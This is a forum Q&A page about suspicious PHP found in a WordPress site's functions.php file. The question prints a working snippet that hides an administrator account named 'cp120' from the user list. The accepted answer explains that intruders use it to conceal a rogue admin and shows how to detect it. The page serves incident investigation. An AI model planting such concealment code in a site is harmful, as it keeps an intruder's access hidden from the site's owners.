dongzhong2674 2013-07-24 21:39
浏览 44
已采纳

网站中的恶意代码窃取管理员密码

I have a client that said they think there site is being hacked. I looked at some stuff and found some suspicious code in their functions.php file. Does anyone recognize any of this and feel its not right?

add_action('pre_user_query','yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
global $current_user;
$username = $current_user->user_login;
if ($username == 'admin') { 
 global $wpdb;
 $user_search->query_where = str_replace('WHERE 1=1',
   "WHERE 1=1 AND {$wpdb->users}.user_login != 'cp120'",$user_search->query_where);
  }
}
  • 写回答

1条回答 默认 最新

  • dongqie2028 2013-08-26 16:33
    关注

    This code, or similar markup is sometimes used by Wordpress hackers. Once they gain access to your Wordpress admin via malicious methods they create a legitimate admin user and then put this code in your functions.php file so that when you go to your admin user section it only displays 1 user. Here is the trick to see if this has happened to you incase you are unfamiliar with php pr don't want to look through a long functions.php file. Go to your admin user area and it will only display the admin users that you know of however the number next to admin users will not match the number of displayed users. it will say (4) but only show 3 names.

    As a note this code can be used for legitimate reasons so make sure if you find this that it wasn't done by your site's admin or developer.

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论

报告相同问题?

悬赏问题

  • ¥15 多址通信方式的抗噪声性能和系统容量对比
  • ¥15 winform的chart曲线生成时有凸起
  • ¥15 msix packaging tool打包问题
  • ¥15 finalshell节点的搭建代码和那个端口代码教程
  • ¥15 用hfss做微带贴片阵列天线的时候分析设置有问题
  • ¥15 Centos / PETSc / PETGEM
  • ¥15 centos7.9 IPv6端口telnet和端口监控问题
  • ¥20 完全没有学习过GAN,看了CSDN的一篇文章,里面有代码但是完全不知道如何操作
  • ¥15 使用ue5插件narrative时如何切换关卡也保存叙事任务记录
  • ¥20 海浪数据 南海地区海况数据,波浪数据